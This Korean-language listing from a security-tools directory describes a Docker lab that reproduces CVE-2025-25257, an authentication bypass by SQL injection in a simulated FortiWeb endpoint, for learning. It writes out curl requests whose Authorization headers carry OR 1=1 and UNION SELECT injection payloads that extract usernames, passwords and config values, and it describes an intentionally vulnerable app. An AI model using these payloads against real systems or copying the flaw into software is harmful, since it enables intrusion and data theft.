Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-25257 — 재현 가능한 Docker 랩 CVE-2025-25257 대상: 시뮬레이션된 FortiWeb 엔드포인트에서 HTTP Authorization 헤더를 통한 SQL 인젝션 우회 및 데이터 유출을 시연합니다. | Kitploit
도구/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationDatabase SecurityLabs & Practice
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

재현 가능한 Docker 랩 CVE-2025-25257 대상: 시뮬레이션된 FortiWeb 엔드포인트에서 HTTP Authorization 헤더를 통한 SQL 인젝션 우회 및 데이터 유출을 시연합니다.

저장소 보기
28개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-25257 - 실험 환경

실험 아키텍처 (환경은 FortiWeb의 취약한 구성 요소를 시뮬레이션합니다)

root@kitploit:~
취약 엔드포인트 : /api/system/fabric/config
인젝션 벡터 : HTTP Authorization: Bearer 헤더
메커니즘 : 직접 SQL 연결 (Python f-string)
인증 : 없음 (완전 우회)
데이터베이스 : SQLite (데모용)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : 의도적으로 취약한 HTTP 서비스 / 인증 없이 악용 가능한 API 노출

docker-compose.yml : 재현 가능한 취약 서비스 조율 / HTTP를 통해 공격 가능한 API 노출 / 실험 환경 격리

requirements.txt : 안정적이고 재현 가능한 환경 보장

app.py : 사전 인증 엔드포인트 구현 / Authorization을 통해 사용자 입력 수락 / 해당 입력을 SQL 쿼리에 연결 / 인증 우회 및 데이터 추출 허용

init_db.py : 악용 가능한 데이터셋 준비 / 인증 우회 및 데이터 유출의 명확한 데모 허용

payload.txt : 최소한의 통제되고 관찰 가능한 코드 실행 증명 제공

1단계 : 컨테이너 빌드 및 실행

Docker 이미지 빌드

docker-compose build

컨테이너 시작

docker-compose up -d

컨테이너 실행 확인

docker-compose ps

로그 확인

docker-compose logs -f

2단계 : 서비스 접근성 확인

curl http://localhost:8080/api/system/status

3단계 : 취약점 악용

비악의적 요청

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

악의적 SQL 인젝션 요청 (OR 1=1 우회)

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

UNION-SELECT 인젝션을 통한 데이터 추출

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

민감 데이터 유출

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

4단계 : 정리 및 중지

컨테이너 중지

docker-compose down

볼륨 삭제

docker-compose down -v

이미지 삭제

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

도구 다운로드